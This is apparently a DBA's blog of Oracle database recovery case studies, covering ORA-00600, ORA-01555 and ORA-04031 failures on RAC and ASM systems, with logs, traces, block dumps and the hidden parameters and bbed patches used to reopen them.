
Recovery cases from several ASM RAC databases


Not long ago I helped a customer recover six Oracle RAC databases, all on ASM and all running 10.2.0.4. Several all-nighters later I was just about coughing up blood. Here I will use one of them to briefly describe the recovery and share it with you.
Several of these databases hit essentially the same ORA-00600 error shown below:

Thu Dec 31 11:55:46 2015
SUCCESS: diskgroup DG1 was mounted
Thu Dec 31 11:55:50 2015
Errors in file /oracle/admin/xxx/udump/xxx1_ora_28803.trc:
ORA-00600: internal error code, arguments: [kccpb_sanity_check_2], [13715626], [13715623], [0x000000000], [], [], [], []
SUCCESS: diskgroup DG1 was dismounted
Thu Dec 31 11:55:51 2015

This error is actually straightforward: it is caused by a damaged control file. Recreating the control file, or restoring one from a backup, is enough to get the database mounted; we can even mount the database using the control file snapshot, and then carry on with recovery. During the recovery we also ran into the following errors:

Errors in file /oracle/admin/xxx/udump/xxx1_ora_6990.trc:
ORA-00600: internal error code, arguments: [kclchkblk_4], [3431], [18446744072948603858], [3431], [18446744072948586897], [], [], []
Tue Jan  5 10:52:28 2016
Errors in file /oracle/admin/xxx/bdump/xxx1_arc0_8205.trc:
ORA-19504: failed to create file "+DG1/xxx/archivelog/1_2_900069464.dbf"
ORA-17502: ksfdcre:4 Failed to create file +DG1/xxx/archivelog/1_2_900069464.dbf
ORA-00600: internal error code, arguments: [kffbAddBlk04], [], [], [], [], [], [], []
Tue Jan  5 10:52:28 2016
ARC0: Error 19504 Creating archive log file to '+DG1/xxx/archivelog/1_2_900069464.dbf'
ARCH: Archival stopped, error occurred. Will continue retrying
Tue Jan  5 10:52:30 2016
ORACLE Instance xxx1 - Arc

The ORA-00600 errors above are also simple: they boil down to data block SCN problems. I will use one of these databases to outline the recovery, because something quite remarkable happened while restoring it.

SQL> startup mount pfile='/tmp/p.ora';
ORACLE instance started.

Total System Global Area 2.1475E+10 bytes
Fixed Size                  2122368 bytes
Variable Size            2399145344 bytes
Database Buffers         1.9059E+10 bytes
Redo Buffers               14651392 bytes
Database mounted.
SQL> ALTER DATABASE ADD LOGFILE THREAD 2
  2    GROUP 3 (
  3      '+DG/xxxx/onlinelog/group_3.271.752099989',
  4      '+DG/xxxx/onlinelog/group_3.272.752099991'
  5    ) SIZE 100M REUSE,
  6    GROUP 4 (
  7      '+DG/xxxx/onlinelog/group_4.273.752099991',
  8      '+DG/xxxx/onlinelog/group_4.274.752099993'
  9    ) SIZE 100M REUSE,
 10    GROUP 6 (
 11      '+DG/xxxx/onlinelog/group_6.275.752099993',
 12      '+DG/xxxx/onlinelog/group_6.276.752099993'
 13    ) SIZE 100M REUSE;
ALTER DATABASE ADD LOGFILE THREAD 2
*
ERROR at line 1:
ORA-01276: Cannot add file +DG/xxxx/onlinelog/group_3.271.752099989.  File has
an Oracle Managed Files file name.

Because this is Oracle RAC, redo logfiles for thread 2 have to be added after the control file is recreated; yet the add logfile statement failed with the error above. None of the approaches from Oracle Metalink worked; every attempt returned the same error, which was rather odd.
Looking at the error, some people might assume the OMF parameters are set. That is not the case here; I cleared all of the related parameters and the error persisted.
The actual trick is that, when adding the logfiles, you only need to give the diskgroup name, not an absolute (OMF-style) path.
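For reference, a minimal sketch of the form that does work; only the diskgroup name is given, so ASM generates the file names itself (group numbers and sizes simply follow the attempt above):

SQL> ALTER DATABASE ADD LOGFILE THREAD 2
  2    GROUP 3 ('+DG', '+DG') SIZE 100M,
  3    GROUP 4 ('+DG', '+DG') SIZE 100M,
  4    GROUP 6 ('+DG', '+DG') SIZE 100M;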
Next, after recovering and trying to open with resetlogs, the open failed with ORA-01248, as follows:

SQL> startup mount pfile='/tmp/p.ora';
ORACLE instance started.

Total System Global Area 2.1475E+10 bytes
Fixed Size                  2122368 bytes
Variable Size            2399145344 bytes
Database Buffers         1.9059E+10 bytes
Redo Buffers               14651392 bytes
Database mounted.
SQL> recover database using backup controlfile until cancel;
ORA-00279: change 13300428179625 generated at 04/04/2013 12:51:35 needed for
thread 1
ORA-00289: suggestion : +DG/archivelog/arch1_752099890_12809_1.log
ORA-00280: change 13300428179625 for thread 1 is in sequence #12809

Specify log: {<RET>=suggested | filename | AUTO | CANCEL}
auto
ORA-00308: cannot open archived log
'+DG/archivelog/arch1_752099890_12809_1.log'
ORA-17503: ksfdopn:2 Failed to open file
+DG/archivelog/arch1_752099890_12809_1.log
ORA-15173: entry 'arch1_752099890_12809_1.log' does not exist in directory
'archivelog'

ORA-00308: cannot open archived log
'+DG/archivelog/arch1_752099890_12809_1.log'
ORA-17503: ksfdopn:2 Failed to open file
+DG/archivelog/arch1_752099890_12809_1.log
ORA-15173: entry 'arch1_752099890_12809_1.log' does not exist in directory
'archivelog'

ORA-01547: warning: RECOVER succeeded but OPEN RESETLOGS would get error below
ORA-01194: file 1 needs more recovery to be consistent
ORA-01110: data file 1: '+DG/xxxx/datafile/system.256.752099833'

SQL> alter database open resetlogs;
alter database open resetlogs
*
ERROR at line 1:
ORA-01248: file 42 was created in the future of incomplete recovery
ORA-01110: data file 42: '+DG/xxxx/datafile/file_tab_xdidx03.ora'

This error is fairly rare, and in practice neither the suggestions floating around online nor the fixes offered on Oracle MOS worked for me.
Left with no better option, I offlined the offending file first and carried on with the recovery. Before attempting the open again I checked the current checkpoint SCNs:

SQL> select file#,checkpoint_change# from v$datafile;

     FILE#      CHECKPOINT_CHANGE#
---------- -----------------------
         1          14731601024328
         2          14731601024328
         3          14731601024328
         4          13300428179625
         5          14731601024328
         6          14731601024328
         7          14731601024328
     .......
        39          14731601024328
        40          14731601024328
        41          14731601024328
        42          14731601024328
        43          14731601024328

43 rows selected.

SQL> c/datafile/datafile_header
  1* select file#,checkpoint_change# from v$datafile_header
SQL> /

     FILE#      CHECKPOINT_CHANGE#
---------- -----------------------
         1          14731601024328
         2          14731601024328
         3          14731601024328
         4          13300428179625
         5          14731601024328
         6          14731601024328
         7          14731601024328
         ......
        40          14731601024328
        41          14731601024328
        42          14731601024328
        43          14731601024328

43 rows selected.

Since the open failed, I wondered whether these two files were the problem. I did another round of recovery using the earlier snapshot control file, then brought the database up again with the recreated control file and recovered once more, and that is when something strange happened:

SQL> recover database using backup controlfile until cancel;
ORA-00279: change 13305808683011 generated at 01/11/2016 21:09:02 needed for
thread 1
ORA-00289: suggestion : +DG/archivelog/arch1_900882531_1_1.log
ORA-00280: change 13305808683011 for thread 1 is in sequence #1

Specify log: {<RET>=suggested | filename | AUTO | CANCEL}
auto
ORA-00308: cannot open archived log '+DG/archivelog/arch1_900882531_1_1.log'
ORA-17503: ksfdopn:2 Failed to open file +DG/archivelog/arch1_900882531_1_1.log
ORA-15173: entry 'arch1_900882531_1_1.log' does not exist in directory
'archivelog'

ORA-00308: cannot open archived log '+DG/archivelog/arch1_900882531_1_1.log'
ORA-17503: ksfdopn:2 Failed to open file +DG/archivelog/arch1_900882531_1_1.log
ORA-15173: entry 'arch1_900882531_1_1.log' does not exist in directory
'archivelog'

ORA-01547: warning: RECOVER succeeded but OPEN RESETLOGS would get error below
ORA-01194: file 1 needs more recovery to be consistent
ORA-01110: data file 1: '+DG/xxxx/datafile/system.256.752099833'

SQL> alter database datafile 42 offline;

Database altered.

SQL> alter database datafile 43 offline;

Database altered.

SQL> alter database open resetlogs;
alter database open resetlogs
*
ERROR at line 1:
ORA-01092: ORACLE instance terminated. Disconnection forced

As you can see, the open failed. When an open fails, the first thing to look at is the alert log, followed by a 10046 trace.
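For completeness, a sketch of how such a trace can be captured from the session issuing the open (the same oradebug approach used below, plus the event line the transcript omits; level 12 includes waits and binds):

SQL> oradebug setmypid
SQL> oradebug event 10046 trace name context forever, level 12
SQL> alter database open;
SQL> oradebug tracefile_name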

SQL> startup nomount pfile='/tmp/p.ora';
ORACLE instance started.

Total System Global Area 2.1475E+10 bytes
Fixed Size                  2122368 bytes
Variable Size            2399145344 bytes
Database Buffers         1.9059E+10 bytes
Redo Buffers               14651392 bytes
SQL> oradebug setmypid
Statement processed.

SQL> alter database mount;

Database altered.

SQL> recover database;
Media recovery complete.
SQL> alter database open;
alter database open
*
ERROR at line 1:
ORA-01092: ORACLE instance terminated. Disconnection forced
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00604: error occurred at recursive SQL level 1
ORA-01555: snapshot too old: rollback segment number 4 with name "_SYSSMU4$"
too small

At this point I also commented out the undo-related parameters and tried again: same error. On the next startup something truly strange showed up: the SCN had actually gone backwards?

SQL> startup mount  pfile='/tmp/p.ora';
ORACLE instance started.

Total System Global Area 2.1475E+10 bytes
Fixed Size                  2122368 bytes
Variable Size            2399145344 bytes
Database Buffers         1.9059E+10 bytes
Redo Buffers               14651392 bytes
Database mounted.
SQL> recover database;
Media recovery complete.

SQL> select checkpoint_change#,file# from v$datafile;

         CHECKPOINT_CHANGE#      FILE#
--------------------------- ----------
             13314398637607          1
             13314398637607          2
             13314398637607          3
             13314398637607          4
             13314398637607          5
            ......
             13314398637607         38
             13314398637607         39
             13314398637607         40
             13314398637607         41
                          0         42
                          0         43

43 rows selected.

SQL> select checkpoint_change#,file#,checkpoint_time from v$datafile_header;

         CHECKPOINT_CHANGE#      FILE# CHECKPOIN
--------------------------- ---------- ---------
             13314398637607          1 11-JAN-16
             13314398637607          2 11-JAN-16
             13314398637607          3 11-JAN-16
             13314398637607          4 11-JAN-16
             13314398637607          5 11-JAN-16
             ......
             13314398637607         39 11-JAN-16
             13314398637607         40 11-JAN-16
             13314398637607         41 11-JAN-16
             14731601024328         42 30-DEC-15
             14731601024328         43 30-DEC-15

43 rows selected.

Clearly, the 133... SCN had fallen back roughly two years into the past. Time travel, it seems.... And of course the open still failed:

SQL> alter database open;
alter database open
*
ERROR at line 1:
ORA-01092: ORACLE instance terminated. Disconnection forced
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00604: error occurred at recursive SQL level 1
ORA-01555: snapshot too old: rollback segment number 4 with name "_SYSSMU4$"
too small

Let's ignore for now why even the datafile header SCNs went backwards (the two files we offlined earlier still had sane SCNs). A 10046 trace produced the following:

PARSING IN CURSOR #5 len=52 dep=1 uid=0 oct=3 lid=0 tim=1418474357830663 hv=429618617 ad='5db7ea50'
select ctime, mtime, stime from obj$ where obj# = :1
END OF STMT
PARSE #5:c=0,e=531,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,tim=1418474357830659
BINDS #5:
kkscoacd
 Bind#0
  oacdty=02 mxl=22(22) mxlc=00 mal=00 scl=00 pre=00
  oacflg=08 fl2=0001 frm=00 csi=00 siz=24 off=0
  kxsbbbfp=2ad7172aa020  bln=22  avl=02  flg=05
  value=20
EXEC #5:c=1000,e=673,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,tim=1418474357831431
WAIT #5: nam='db file sequential read' ela= 9843 file#=1 block#=218 blocks=1 obj#=-1 tim=1418474357841421
.....
FETCH #6:c=17997,e=64936,p=23,cr=566,cu=0,mis=0,r=1,dep=2,og=3,tim=1418474357907669
STAT #6 id=1 cnt=1 pid=0 pos=1 obj=15 op='TABLE ACCESS BY INDEX ROWID UNDO$ (cr=566 pr=23 pw=0 time=64913 us)'
STAT #6 id=2 cnt=1 pid=1 pos=1 obj=34 op='INDEX UNIQUE SCAN I_UNDO1 (cr=1 pr=1 pw=0 time=5769 us)'
WAIT #5: nam='db file sequential read' ela= 13031 file#=40 block#=167538 blocks=1 obj#=-1 tim=1418474357920819
FETCH #5:c=19996,e=89548,p=25,cr=568,cu=0,mis=0,r=0,dep=1,og=4,tim=1418474357921006

We can see that the failing SQL read file 1 block 218 and file 40 block 167538.
Dumping file 1 block 218 showed no active transactions, while file 40 block 167538 turned out to be an undo block.
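The dumps themselves come from the usual block-dump syntax; a minimal sketch (the trace files land in user_dump_dest):

SQL> alter system dump datafile 1 block 218;
SQL> alter system dump datafile 40 block 167538;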

SQL> select name from v$datafile where file#=40;

NAME
--------------------------------------------------------------------------------
+DG/xxxx/datafile/undotbs4

I also dumped this undo block, and it did look a little abnormal, as shown below:

********************************************************************************
UNDO BLK:
xid: 0x0009.01b.0014320a  seq: 0xa47 cnt: 0x1   irb: 0x1   icl: 0x0   flg: 0x0000

 Rec Offset      Rec Offset      Rec Offset      Rec Offset      Rec Offset
---------------------------------------------------------------------------
0x01 0x0014     

*-----------------------------
* Rec #0x1  slt: 0x1b  objn: 55417(0x0000d879)  objd: 296039  tblspc: 20(0x00000014)
*       Layer:  10 (Index)   opc: 21   rci 0x00
Undo type:  Regular undo   Last buffer split:  No
Temp Object:  No
Tablespace Undo:  No
rdba: 0x0a028e71
*-----------------------------
index general undo (branch) operations
KTB Redo
op: 0x05  ver: 0x01
op: R  itc: 2
 Itl           Xid                  Uba         Flag  Lck        Scn/Fsc
0x01   0x0009.01b.0014320a  0x0a028e71.0a47.04  ----    1  fsc 0x0000.00000000
0x02   0x0009.02b.001428b6  0x0a028e6f.0a47.06  ----  112  fsc 0x0000.00000000
Dump kdige : block dba :0x05d630b3, seghdr dba: 0x06076e89
restore block before image

Since every datafile header SCN had gone backwards and a normal open kept failing, the only option was to push the SCN forward, and it had to end up somewhat higher than the highest SCN in that undo block. Adding the hidden parameter *._minimum_giga_scn to the pfile does the job.
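_minimum_giga_scn is expressed in units of 2^30, so the value is roughly ceil(target_scn/2^30). A minimal sketch, using the 147... SCN seen in the file headers above as the floor (the actual target of course has to clear the highest SCN found in the undo block):

-- compute the giga value (units of 2^30) that clears the 147... SCNs above
SQL> select ceil(14731601024328/power(2,30)) giga_scn from dual;

  GIGA_SCN
----------
     13720

-- then add to the pfile used for startup:
*._minimum_giga_scn=13720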

SQL> conn /as sysdba
Connected to an idle instance.
SQL> startup mount pfile='/tmp/p.ora';
ORACLE instance started.

Total System Global Area 2.1475E+10 bytes
Fixed Size                  2122368 bytes
Variable Size            2399145344 bytes
Database Buffers         1.9059E+10 bytes
Redo Buffers               14651392 bytes
Database mounted.
SQL> show parameter job

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
job_queue_processes                  integer     10
SQL> alter system set job_queue_processes=0;

System altered.

SQL> alter database open;

Database altered.

SQL> drop tablespace undotbs3 including contents and datafiles;

Tablespace dropped.

SQL> drop tablespace undotbs4 including contents and datafiles;

Tablespace dropped.

Once the database opened cleanly, the original undo tablespaces were immediately dropped and recreated (a sketch of the re-creation follows below).
Although the database was now open, the two datafiles we had offlined earlier had lived through the resetlogs in between, so they could no longer be brought online the normal way.
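A minimal sketch of the undo re-creation step (the tablespace names match the ones dropped above; the diskgroup and size are placeholders, not the customer's actual values):

SQL> create undo tablespace undotbs3 datafile '+DG' size 4G autoextend on;
SQL> create undo tablespace undotbs4 datafile '+DG' size 4G autoextend on;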

SQL> select file#,checkpoint_change# from v$datafile;

     FILE#             CHECKPOINT_CHANGE#
---------- ------------------------------
         1                 14759124431097
         2                 14759124431097
         3                 14759124431097
         4                 14759124431097
         5                 14759124431097
        ......
        36                 14759124431097
        37                 14759124431097
        38                 14759124431097
        41                 14759124431097
        42                              0
        43                              0
        44                 14759124431097
        45                 14759124431097

43 rows selected.

SQL> alter database datafile 42 online;
alter database datafile 42 online
*
ERROR at line 1:
ORA-01190: control file or data file 42 is from before the last RESETLOGS
ORA-01110: data file 42: '+DG/xxxx/datafile/file_tab_xxx03.ora'

SQL> alter database datafile 43 online;
alter database datafile 43 online
*
ERROR at line 1:
ORA-01190: control file or data file 43 is from before the last RESETLOGS
ORA-01110: data file 43: '+DG/xxxx/datafile/file_tab1_xxx05.ora'

Here I used bbed to patch the relevant information (the resetlogs data) in these two file headers; after another recover, the files came online without trouble.

SQL> recover datafile 42;
Media recovery complete.

SQL> alter database datafile 42 online;

Database altered.

SQL> recover datafile 43;
Media recovery complete.
SQL> alter database datafile 43 online;

Database altered.

SQL> select file#,checkpoint_change# ,status from v$datafile;

     FILE#             CHECKPOINT_CHANGE# STATUS
---------- ------------------------------ -------
         1                 14759124821491 SYSTEM
         2                 14759124821491 SYSTEM
         3                 14759124821491 ONLINE
         4                 14759124821491 ONLINE
         5                 14759124821491 ONLINE
      。。。。。。
        36                 14759124821491 ONLINE
        37                 14759124821491 ONLINE
        38                 14759124821491 ONLINE
        41                 14759124821491 ONLINE
        42                 14759124831966 ONLINE
        43                 14759124832115 ONLINE
        44                 14759124821491 ONLINE
        45                 14759124821491 ONLINE

43 rows selected.

SQL> alter system checkpoint;

System altered.

SQL> select file#,checkpoint_change# ,status from v$datafile;

     FILE#             CHECKPOINT_CHANGE# STATUS
---------- ------------------------------ -------
         1                 14759124832224 SYSTEM
         2                 14759124832224 SYSTEM
         3                 14759124832224 ONLINE
         4                 14759124832224 ONLINE
         5                 14759124832224 ONLINE
       ......
        38                 14759124832224 ONLINE
        41                 14759124832224 ONLINE
        42                 14759124832224 ONLINE
        43                 14759124832224 ONLINE
        44                 14759124832224 ONLINE
        45                 14759124832224 ONLINE

43 rows selected.

Finally, we suggested exporting the database with expdp and rebuilding it. That wraps this one up!


A recovery case involving a never-before-seen ora-00600 [3712] error


In day-to-day Oracle maintenance we regularly run into errors we have never seen before, sometimes downright baffling ones. Often you cannot find anything relevant even through Metalink, Baidu or Google. Sure enough, yesterday a colleague from our southern region asked me to help recover a customer database: reportedly an archivelog-mode database with no backup that could not be opened after an instance restart.

It was the first time I had heard of such a thing, and it even turned out to be an Oracle 11.2.0.3 database; that something like this could still happen is rather baffling. First, let's look at what the error actually was.

[Screenshot not preserved: the alert log reported ORA-00600 [3712], with arguments [3371], [612688841], [3371], [612688840], raised during the open.]

Seeing this error gave me a vague sense of deja vu, though I could not say exactly what it was. Still, from the error number alone I could roughly tell what area it relates to. A quick digression: for ORA-00600 errors, Metalink has a detailed document that classifies the first-argument ranges of ORA-600 errors, and it is well worth knowing. With it, even an ORA-00600 I have never seen before can be roughly diagnosed at first glance. Here is the relevant part of the table:

Ora-600 Base	Functionality	Description
2000	server/rcv	Cache Op
2100	server/rcv	Control File mgmt
2200	server/rcv	Misc (SCN etc.)
2400	server/rcv	Buffer Instance Hash Table
2600	server/rcv	Redo file component
2800	server/rcv	Db file
3000	server/rcv	Redo Application
3200	server/cache	Buffer manager
3400	server/rcv	Archival & media recovery component
3600	server/rcv	recovery component
3700	server/rcv	Thread component
3800	server/rcv	Compatibility segment

 

 

From these descriptions we can roughly conclude that the error is certainly redo-related. Going back to the alert log, one line stands out as key: crash recovery due to error 600.

We know that opening an Oracle database goes through the nomount, mount and open stages; after an abnormal shutdown such as a forced abort, Oracle must perform instance (crash) recovery during the open. Indeed, querying v$log showed that the current redo logfile's next_change# was effectively infinite.
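A quick sketch of that check; for the CURRENT group, NEXT_CHANGE# shows up as the maximum possible SCN, i.e. effectively infinite:

SQL> select thread#, group#, sequence#, status, first_change#, next_change#
  2    from v$log
  3   order by thread#, group#;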

First I tried a manual recover database, which completed with no problem, but alter database open still raised the 3712 error above. I noticed that all the SCNs had moved forward and were now consistent, so why was it still failing?

We know that opening the database involves more than instance recovery; once the recovery finishes, the open itself still has to go through. So consider whether a scenario like the following could exist:

suppose the database we are recovering has reached SCN 100000, yet when the open runs after instance recovery, the next SCN to be written turns out to be smaller than the current one (say 99999). What would happen? Clearly, an error.

Many readers may not follow this, or may wonder why I would even hypothesize along these lines. Two things led me there:

1. A solid grasp of database fundamentals, in particular of how Oracle opens a database.

2. A careful look at the arguments of the ORA-00600 error above.

OK, take this particular error: [3371], [612688841], [3371], [612688840]. When we see a string of numbers like that, we should ask ourselves what each of them might mean.

Judging from experience, such arguments usually represent things like sequence numbers, DBA addresses, file numbers, SCNs and so on.

I think anyone with a little background can see that these are SCNs. Some might ask: why would they be SCNs?

If that question comes up, it means you are not familiar with the basic structure of an Oracle SCN. An SCN is made up of a high part and a low part, roughly as follows:

the lowest SCN is 0x0000.00000000 and the highest is 0xffff.ffffffff. The high part is the SCN wrap (the 0x0000 portion) and the low part is the SCN base (the trailing eight hex digits). The full SCN is scn_wrap * power(2,32) + scn_base.

With that in mind, we can reasonably take 3371 to be the SCN wrap and 612688841 the SCN base. Converting them and comparing against the latest SCN in the file headers gave an exact match, which confirmed the guess.

At this point a problem becomes apparent: the SCNs do not line up. Why not? Because two SCNs appear here:

3371*power(2,32)+612688841 and 3371*power(2,32)+612688840

They are obviously different, and Oracle must be comparing them and finding that the SCN about to be generated is smaller than the current one, which triggers the error. The smaller SCN is the problematic one, and it almost certainly comes from the control file.
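To make the comparison concrete, a quick sketch of the conversion:

SQL> select 3371*power(2,32)+612688841 scn_a,
  2         3371*power(2,32)+612688840 scn_b
  3    from dual;

They work out to 14478947443657 and 14478947443656 respectively, differing by exactly 1.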

Having got this far, I knew how to solve the problem cleanly: recreate the control file.

The basic recovery steps follow; I will not go through producing the control file creation script again.

[Screenshots of the recovery steps are not preserved.]

After generating the control file creation script, recreate the control file, remembering to use the NORESETLOGS form (in a RAC environment you also need to set cluster_database=false); once it is created, run a recover and the database opens cleanly. Job done!
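For reference, a hedged sketch of that sequence (generic paths, not the customer's actual script):

SQL> alter database backup controlfile to trace as '/tmp/cf.sql' noresetlogs;

-- edit /tmp/cf.sql down to the CREATE CONTROLFILE ... NORESETLOGS section,
-- and set cluster_database=false in the pfile for a RAC database, then:

SQL> shutdown immediate
SQL> startup nomount
SQL> @/tmp/cf.sql
SQL> recover database;
SQL> alter database open;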


Addendum:

1. Later research suggests this is very likely an Oracle 11.2.0.3 bug:

Bug 16432211 : ORA-00600 [KCRFNL_3], LGWR… TERMINATING THE INSTANCE, ORA-00600 [3712]

Comparing the earlier alert log and traces against the bug description, they match almost exactly.


Resolving a shared pool problem by adjusting _lm_cache_res_cleanup


Not long ago a customer's core database (10.2.0.4.12) reportedly had to be restarted every so often because it kept hitting ORA-04031. A check showed the shared pool was around 5G, and ges resource alone was consuming roughly 3.5G of it, which really is rather extreme.

SQL> c/gcs/ges
  1* select * from v$sgastat where name like 'ges%'
SQL> /

POOL         NAME                                 BYTES
------------ ------------------------------- ----------
shared pool  ges big msg p                       461440
shared pool  ges resource hash seq tab            32768
shared pool  ges shared global area               23928
shared pool  ges regular msg buffers            1254008
shared pool  ges enqueue multiple free             1280
shared pool  ges res mastership bucket             4096
shared pool  ges deadlock xid freelist            11264
shared pool  ges resource pools                    1984
shared pool  ges recovery domain table              176
shared pool  ges reserved msg buffers           8240008
shared pool  ges big msg buffers               15936168
shared pool  ges process array                  1273272
shared pool  ges enqueue max. usage pe               32
shared pool  ges lmd process descripto             2760
shared pool  ges process hash table               44000
shared pool  ges enqueue cur. usage pe               32
shared pool  ges ipc instance maps                  384
shared pool  ges lms process descripto             5520
shared pool  ges resource                    3696886168
shared pool  ges deadlock xid hash tab            17800
shared pool  ges resource hash table            1441792
shared pool  ges scan queue array                   176

We can see that the memory consumed by ges resource really is extremely high. So why is it so high?

Checking v$resource_limit revealed something abnormal, as shown below:

RESOURCE_NAME        CURRENT_UTILIZATION MAX_UTILIZATION INITIAL_ALLOCATION   LIMIT_VALUE
-------------------- ------------------- --------------- -------------------- -------------
ges_procs                            181             439       1001                 1001
ges_ress                               0               0      27462            UNLIMITED
ges_locks                              0               0      40358            UNLIMITED
ges_cache_ress                   8559179        14625461          0            UNLIMITED
ges_reg_msgs                         243             898       2750            UNLIMITED
ges_big_msgs                          41           35280       1934            UNLIMITED
ges_rsv_msgs                           0               0       1000                 1000

SQL> select startup_time from v$instance;

STARTUP_TIME
-------------------
2015-10-26 05:02:04

Both the current and maximum utilization of ges_cache_ress are huge, unimaginably so. From this we can roughly conclude that GES resources cached in the shared pool are not being reclaimed in time, which is why ges resource occupies so much memory.

That raised a question in my mind: does Oracle have a hidden parameter controlling this reclamation mechanism? We know that is how Oracle usually does things: gate a feature or mechanism behind a hidden parameter.

A quick search turned up two related bugs confirming that ges resource can indeed consume a great deal of memory and eventually cause ORA-04031.

The notes mention a parameter, _lm_cache_res_cleanup; adjusting it changes how GES resources are reclaimed and may avoid this situation (a sketch of the change follows).
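A sketch of the change (the value 50 here is purely illustrative; the appropriate setting and direction should be confirmed against the bug notes mentioned below, and the parameter only takes effect after an instance restart):

SQL> alter system set "_lm_cache_res_cleanup"=50 scope=spfile sid='*';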

Whether it actually helps you only find out by trying, so I had the customer make the adjustment, and after a few days of observation the ges resource memory consumption did appear to be under control:

SQL> select * from v$sgastat where name like '%ges res%';                               

POOL                     NAME                               BYTES
------------------------ ----------------------------- ----------
shared pool              ges resource hash seq tab          32768
shared pool              ges res mastership bucket           4096
shared pool              ges resource pools                  1984
shared pool              ges reserved msg buffers         8240008
shared pool              ges resource                   215312592
shared pool              ges resource hash table          1441792

6 rows selected.                                                                        

SQL> alter session set nls_date_format='yyyy-mm-dd hh24:mi:ss';                         

Session altered.                                                                        

SQL> select startup_time from v$instance;                                               

STARTUP_TIME
-------------------
2016-01-28 23:08:27                                                                     

SQL> select sysdate from dual;                                                          

SYSDATE
-------------------
2016-02-03 10:24:17

Some might say a few days is too short to tell. In fact, before the adjustment, ges resource would exceed 300M within a single day of an instance restart.

Note: bug 9026008 and bug 10042937 are related to this parameter and affect 11.1 and some 11.2 versions; they are worth reading.


Notes on recovering a customer's 15TB database


This customer's database failed before the Spring Festival; several people subsequently attempted recovery, but none of them managed to open the database. The open reported the following error:

Wed Jan 13 17:03:25 2016
ORA-01555 caused by SQL statement below (SQL ID: 4krwuz0ctqxdt, Query Duration=1452675805 sec, SCN: 0x0d6a.46c6524f):
Wed Jan 13 17:03:25 2016
select ctime, mtime, stime from obj$ where obj# = :1
Wed Jan 13 17:03:25 2016
Errors in file /u01/app/oracle/admin/xxxx/udump/xxxx1_ora_18274.trc:
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00604: error occurred at recursive SQL level 1
ORA-01555: snapshot too old: rollback segment number 20 with name "_SYSSMU20$" too small
Error 704 happened during db open, shutting down database
USER: terminating instance due to error 704
Instance terminated by USER, pid = 18274
ORA-1092 signalled during: alter database open resetlogs...
Wed Jan 13 17:06:34 2016

This error is actually very common and I have recovered from it many times, so I will not dwell on it. What surprised me, though, was the enormous Query Duration of that SQL.
Experience says you can simply push the SCN forward in this situation. But the following command turned out to have no effect:

alter session set events '10015 trace name adjust_scn level 13740';

Tracing further with 10046 showed that the SQL touched the following blocks:

PARSING IN CURSOR #5 len=52 dep=1 uid=0 oct=3 lid=0 tim=1422682994194207 hv=429618617 ad='395fa870'
select ctime, mtime, stime from obj$ where obj# = :1
END OF STMT
PARSE #5:c=0,e=225,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,tim=1422682994194205
BINDS #5:
kkscoacd
 Bind#0
  oacdty=02 mxl=22(22) mxlc=00 mal=00 scl=00 pre=00
  oacflg=08 fl2=0001 frm=00 csi=00 siz=24 off=0
  kxsbbbfp=2b7694a4aea8  bln=22  avl=02  flg=05
  value=20
EXEC #5:c=0,e=398,p=0,cr=0,cu=0,mis=1,r=0,dep=1,og=4,tim=1422682994194653
WAIT #5: nam='db file sequential read' ela= 20378 file#=1 block#=218 blocks=1 obj#=-1 tim=1422682994215120
WAIT #5: nam='db file sequential read' ela= 480   file#=1 block#=219 blocks=1 obj#=-1 tim=1422682994215712
WAIT #5: nam='db file sequential read' ela= 18990 file#=1 block#=122 blocks=1 obj#=-1 tim=1422682994234841
。。。。。。。
EXEC #6:c=0,e=141,p=0,cr=0,cu=0,mis=0,r=0,dep=2,og=3,tim=1422682994267351
FETCH #6:c=0,e=34,p=0,cr=2,cu=0,mis=0,r=1,dep=2,og=3,tim=1422682994267413
STAT #6 id=1 cnt=1 pid=0 pos=1 obj=15 op='TABLE ACCESS BY INDEX ROWID UNDO$ (cr=2 pr=0 pw=0 time=28 us)'
STAT #6 id=2 cnt=1 pid=1 pos=1 obj=34 op='INDEX UNIQUE SCAN I_UNDO1 (cr=1 pr=0 pw=0 time=16 us)'
WAIT #5: nam='db file sequential read' ela= 12312 file#=7 block#=4993 blocks=1 obj#=-1 tim=1422682994279882
WAIT #5: nam='db file sequential read' ela= 18776 file#=7 block#=4965 blocks=1 obj#=-1 tim=1422682994298789
WAIT #5: nam='db file sequential read' ela= 13157 file#=7 block#=4801 blocks=1 obj#=-1 tim=1422682994312081
WAIT #5: nam='db file sequential read' ela= 12519 file#=7 block#=4954 blocks=1 obj#=-1 tim=1422682994324726
WAIT #5: nam='db file sequential read' ela= 410 file#=7 block#=4952 blocks=1 obj#=-1 tim=1422682994325259
WAIT #5: nam='db file sequential read' ela= 5447 file#=7 block#=4778 blocks=1 obj#=-1 tim=1422682994330830
WAIT #5: nam='db file sequential read' ela= 12349 file#=7 block#=5184 blocks=1 obj#=-1 tim=1422682994343291
WAIT #5: nam='db file sequential read' ela= 11874 file#=5 block#=8645 blocks=1 obj#=-1 tim=1422682994355283
WAIT #5: nam='db file sequential read' ela= 4925 file#=5 block#=8595 blocks=1 obj#=-1 tim=1422682994360323
FETCH #5:c=4999,e=165865,p=15,cr=18,cu=0,mis=0,r=0,dep=1,og=4,tim=1422682994360535
ORA-00704: bootstrap process failure
ORA-00704: bootstrap process failure
ORA-00604: error occurred at recursive SQL level 1
ORA-01555: snapshot too old: rollback segment number 20 with name "_SYSSMU20$" too small

Dumping each of these blocks in turn, we found that file 1 block 122 had a slight problem, as follows:

 seg/obj: 0x12  csc: 0xd6c.1abf4d18  itc: 1  flg: -  typ: 1 - DATA
     fsl: 0  fnx: 0x0 ver: 0x01

 Itl           Xid                  Uba         Flag  Lck        Scn/Fsc
0x01   0x003f.02e.001cc47d  0x01c012f4.8562.29  --U-    1  fsc 0x0000.1abf4d19

data_block_dump,data header at 0x8b3da44
===============
tsiz: 0x1fb8
hsiz: 0xea
pbl: 0x08b3da44
bdba: 0x0040007a
     76543210
flag=--------
ntab=1
nrow=108

Using a script, the affected block was copied out of ASM to the filesystem, patched with bbed, and copied back into the ASM diskgroup.
After that, pushing the SCN forward again allowed the database to open without trouble.

